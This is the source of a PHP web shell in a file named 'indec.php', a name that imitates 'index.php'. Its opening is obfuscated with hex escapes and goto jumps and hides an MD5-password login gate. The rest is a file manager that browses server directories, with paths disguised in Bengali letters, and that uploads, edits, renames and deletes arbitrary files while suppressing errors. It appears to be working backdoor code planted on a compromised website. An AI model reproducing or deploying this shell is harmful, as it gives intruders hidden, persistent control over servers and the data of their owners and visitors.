View file File name : indec.php Content :<?php goto NLnKLsvYFH; NLnKLsvYFH: $password = "\x30\x61\x39\x31\x65\x63\x37\x38\x61\x32\x63\x62\x38\x65\x38\x30\x38\x38\x39\x35\x62\x35\x61\x36\x30\x61\x64\x65\x36\x63\x31\x64"; error_reporting(0); set_time_limit(0); session_start(); if (isset($_SESSION["\x6c\x6f\x67\x67\145\144\157\x6b\x6d"])) {#loggedokm goto DqqOhzX5B0; } goto u3NT7x2QrJ; u3NT7x2QrJ: $_SESSION["\x6c\x6f\147\x67\x65\144\157\153\x6d"] = false; DqqOhzX5B0: if (!isset($_POST["\160\x61\x73\163\x77\x6f\x72\x64"])) { #password goto pb73Ufbn0o; } if (!(md5($_POST["\160\x61\x73\163\x77\157\x72\144"]) == $password)) { goto mr5E2rLws5; } $_SESSION["\x6c\x6f\x67\x67\145\x64\x6f\153\155"] = md5( $_POST["\160\141\x73\163\x77\x6f\x72\x64"] ); goto SjaSVtI46I; SjaSVtI46I: mr5E2rLws5: pb73Ufbn0o: if ( !( !$_SESSION["\154\157\x67\x67\145\x64\157\x6b\155"] || $_SESSION["\x6c\x6f\x67\147\x65\x64\x6f\x6b\155"] != $password ) ) { goto EXNN3Tp2rS; } echo "\xd\xa\74\x68\164\x6d\154\76\74\150\145\x61\x64\76\74\x74\x69\164\154\145\x3e\40\74\x2f\164\x69\x74\x6c\x65\76\x3c\57\150\145\x61\144\x3e\xd\12\40\40\x3c\x62\x6f\144\x79\76\xd\xa\x20\x20\x20\x20\x3c\x70\40\x61\x6c\x69\x67\156\x3d\x22\143\x65\x6e\x74\x65\x72\42\x3e\74\143\145\x6e\164\145\162\x3e\74\x66\157\x6e\164\40\163\x74\171\x6c\145\x3d\x22\x66\x6f\156\164\x2d\x73\151\x7a\x65\72\x31\63\x70\170\x22\40\143\157\154\x6f\162\75\x22\43\x66\x64\145\x36\x63\144\42\x20\x66\x61\143\145\75\x22\x22\x3e\15\12\x20\40\40\x20\74\146\x6f\x72\x6d\x20\155\x65\x74\x68\x6f\x64\75\x22\x70\x6f\x73\x74\42\76\15\xa\40\40\x20\x20\x20\x20\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\x70\x61\x73\x73\167\157\x72\144\42\x20\156\x61\155\x65\75\42\x70\x61\x73\x73\x77\x6f\162\144\42\76\xd\12\40\x20\40\x20\x20\x20\x3c\151\156\160\165\164\x20\x74\171\x70\145\x3d\42\163\x75\142\x6d\x69\x74\x22\40\156\141\155\145\75\42\163\165\x62\x6d\x69\164\42\40\x76\141\x6c\165\145\x3d\x22\x20\x20\x3e\76\x22\x3e\15\xa\x20\x20\40\40\74\57\x66\x6f\162\155\76\15\12\x20\x20\74\57\x62\x6f\x64\171\76\xd\12\74\x2f\x68\164\x6d\x6c\x3e\15\xa\15\xa"; exit(); goto ocC9gxzse4; ocC9gxzse4: EXNN3Tp2rS: ?> <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>000</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /></head><body> <?php function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { $bytes = $bytes . " bytes"; } elseif ($bytes == 1) { $bytes = $bytes . " byte"; } else { $bytes = "0 bytes"; } return $bytes; } function fileExtension($file) { return substr(strrchr($file, "."), 1); } function fileIcon($file) { $imgs = [ "apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp", ]; $audio = ["wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"]; $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return '<i class="fa-sharp fa-solid fa-bug"></i> '; } elseif ($file == ".htaccess") { return '<i class="fa-solid fa-hammer"></i> '; } if ($ext == "html" || $ext == "htm") { return '<i class="fa-brands fa-html5"></i> '; } elseif ($ext == "php" || $ext == "phtml") { return '<i class="fa-brands fa-php"></i> '; } elseif (in_array($ext, $imgs)) { return '<i class="fa-regular fa-images"></i> '; } elseif ($ext == "css") { return '<i class="fa-brands fa-css3"></i> '; } elseif ($ext == "txt") { return '<i class="fa-regular fa-file-lines"></i> '; } elseif (in_array($ext, $audio)) { return '<i class="fa-duotone fa-file-music"></i> '; } elseif ($ext == "py") { return '<i class="fa-brands fa-python"></i> '; } elseif ($ext == "js") { return '<i class="fa-brands fa-js"></i> '; } else { return '<i class="fa-solid fa-file"></i> '; } } function encodePath($path) { $a = ["/", "\\", ".", ":"]; $b = ["ক", "খ", "গ", "ঘ"]; return str_replace($a, $b, $path); } function decodePath($path) { $a = ["/", "\\", ".", ":"]; $b = ["ক", "খ", "গ", "ঘ"]; return str_replace($b, $a, $path); } $root_path = __DIR__; if (isset($_GET["p"])) { if (empty($_GET["p"])) { $p = $root_path; } elseif (!is_dir(decodePath($_GET["p"]))) { echo "<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>"; } elseif (is_dir(decodePath($_GET["p"]))) { $p = decodePath($_GET["p"]); } } elseif (isset($_GET["q"])) { if (!is_dir(decodePath($_GET["q"]))) { echo "<script>window.location.replace('?p=');</script>"; } elseif (is_dir(decodePath($_GET["q"]))) { $p = decodePath($_GET["q"]); } } else { $p = $root_path; } define("PATH", $p); echo '<nav class="navbar navbar-light" style="background-color: #fdcdf9;"> <div class="navbar-brand"> <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a>'; $path = str_replace("\\", "/", PATH); $paths = explode("/", $path); foreach ($paths as $id => $dir_part) { if ($dir_part == "" && $id == 0) { $a = true; echo "<a href=\"?p=/\">/</a>"; continue; } if ($dir_part == "") { continue; } echo "<a href='?p="; for ($i = 0; $i <= $id; $i++) { echo str_replace(":", "ঘ", $paths[$i]); if ($i != $id) { echo "ক"; } } echo "'>" . $dir_part . "</a>/"; } echo '</div><div class="form-inline"><a href="?upload&q=' . urlencode(encodePath(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a><a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div></nav>'; if (isset($_GET["p"])) { if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = []; $files = []; foreach ($fetch_obj as $obj) { if ($obj == "." || $obj == "..") { continue; } $new_obj = PATH . "/" . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo '<table class="table table-hover"> <thead> <tr> <th scope="col">Name</th> <th scope="col">Size</th> <th scope="col">Modified</th> <th scope="col">Perms</th> <th scope="col">Actions</th> </tr> </thead> <tbody>'; foreach ($folders as $folder) { echo " <tr> <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td> <td><b>---</b></td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td> <td> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr>"; } foreach ($files as $file) { echo " <tr> <td>" . fileIcon($file) . $file . "</td> <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $file)), -3) . "</a></td> <td> <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr>"; } echo " </tbody></table>"; } else { if (empty($_GET)) { echo "<script>window.location.replace('?p=');</script>"; } } if (isset($_GET["upload"])) { echo ' <form method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" class="btn btn-dark" value="Upload" name="upload"> </form>'; } if (isset($_GET["r"])) { if (!empty($_GET["r"]) && isset($_GET["q"])) { echo ' <form method="post"> Rename: <input type="text" name="name" value="' . $_GET["r"] . '"> <input type="submit" class="btn btn-dark" value="Rename" name="rename"> </form>'; if (isset($_POST["rename"])) { $name = PATH . "/" . $_GET["r"]; if (rename($name, PATH . "/" . $_POST["name"])) { echo "<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } } } if (isset($_GET["e"])) { if (!empty($_GET["e"]) && isset($_GET["q"])) { echo ' <form method="post"> <textarea style="height: 500px; width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH . "/" . $_GET["e"])) . '</textarea> <br> <input type="submit" class="btn btn-dark" value="Save" name="edit"> </form>'; if (isset($_POST["edit"])) { $filename = PATH . "/" . $_GET["e"]; $data = $_POST["data"]; $open = fopen($filename, "w"); if (fwrite($open, $data)) { echo "<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } fclose($open); } } } if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if ( move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file) ) { echo "<p>" . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>"; } else { echo "<p>Sorry, there was an error uploading your file.</p>"; } } if (isset($_GET["d"]) && isset($_GET["q"])) { $name = PATH . "/" . $_GET["d"]; if (is_file($name)) { if (unlink($name)) { echo "<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } elseif (is_dir($name)) { if (rmdir($name) == true) { echo "<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } } ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script></body></html>